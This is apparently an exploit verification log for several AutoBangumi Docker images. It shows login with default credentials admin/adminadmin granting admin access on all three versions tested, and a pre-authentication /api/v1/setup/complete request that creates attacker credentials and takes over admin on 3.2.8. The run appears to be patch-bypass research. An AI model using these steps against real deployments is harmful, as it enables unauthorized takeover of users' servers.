[*] Pulling images pull ghcr.io/estrellaxd/auto_bangumi:3.2.6 pull ghcr.io/estrellaxd/auto_bangumi:latest pull ghcr.io/estrellaxd/auto_bangumi:3.3.0-beta.2 ========== [VULNERABLE 3.2.6] ghcr.io/estrellaxd/auto_bangumi:3.2.6 — default-creds bypass test ========== image VERSION = 3.2.6 [+] startup seeded default admin user (add_default_user) no-auth GET /api/v1/rss -> 401 (401 = DEV bypass NOT active) POST /api/v1/auth/login admin/adminadmin [+] VULNERABLE 3.2.6: default-cred LOGIN SUCCEEDED (200 + admin JWT) GET /api/v1/rss with JWT cookie -> 200 [+] VULNERABLE 3.2.6: ADMIN ACCESS CONFIRMED (/api/v1/rss 200) ========== [FIXED/LATEST (:latest=3.2.8)] ghcr.io/estrellaxd/auto_bangumi:latest — default-creds bypass test ========== image VERSION = 3.2.8 [+] startup seeded default admin user (add_default_user) no-auth GET /api/v1/rss -> 401 (401 = DEV bypass NOT active) POST /api/v1/auth/login admin/adminadmin [+] FIXED/LATEST (:latest=3.2.8): default-cred LOGIN SUCCEEDED (200 + admin JWT) GET /api/v1/rss with JWT cookie -> 200 [+] FIXED/LATEST (:latest=3.2.8): ADMIN ACCESS CONFIRMED (/api/v1/rss 200) ========== [LATEST BETA 3.3.0-beta.2] ghcr.io/estrellaxd/auto_bangumi:3.3.0-beta.2 — default-creds bypass test ========== image VERSION = 3.3.0-beta.2 [+] startup seeded default admin user (add_default_user) no-auth GET /api/v1/rss -> 401 (401 = DEV bypass NOT active) POST /api/v1/auth/login admin/adminadmin [+] LATEST BETA 3.3.0-beta.2: default-cred LOGIN SUCCEEDED (200 + admin JWT) GET /api/v1/rss with JWT cookie -> 200 [+] LATEST BETA 3.3.0-beta.2: ADMIN ACCESS CONFIRMED (/api/v1/rss 200) ========== [FIXED/LATEST (:latest=3.2.8)] ghcr.io/estrellaxd/auto_bangumi:latest — /setup/complete pre-auth takeover (Variant 2) ========== image VERSION = 3.2.8 GET /api/v1/setup/status (pre-auth) -> 200 body={"need_setup":true,"version":"3.2.8"} POST /api/v1/setup/complete (pre-auth, attacker creds) -> 200 POST /api/v1/auth/login pwned/pwnedpw1 -> 200 GET /api/v1/rss with attacker JWT -> 200 POST /api/v1/auth/login admin/adminadmin (post-takeover) -> 401 [+] FIXED/LATEST (:latest=3.2.8): VARIANT 2 CONFIRMED — pre-auth /setup/complete -> attacker admin takeover ================ VARIANT SUMMARY ================ VARIANT 1 (default-creds bypass): vuln_login=1 vuln_admin=1 (ver=3.2.6) | latest_login=1 latest_admin=1 (ver=3.2.8) | beta_login=1 (ver=3.3.0-beta.2) VARIANT 2 (/setup/complete pre-auth takeover): setup_takeover=1 (ver=3.2.8) RULE-OUT: DEV_AUTH_BYPASS active=0 (0 = not active in official images, as expected) [===] BYPASS/CONFIRMED: variant(s) reproduced on the FIXED/LATEST AutoBangumi image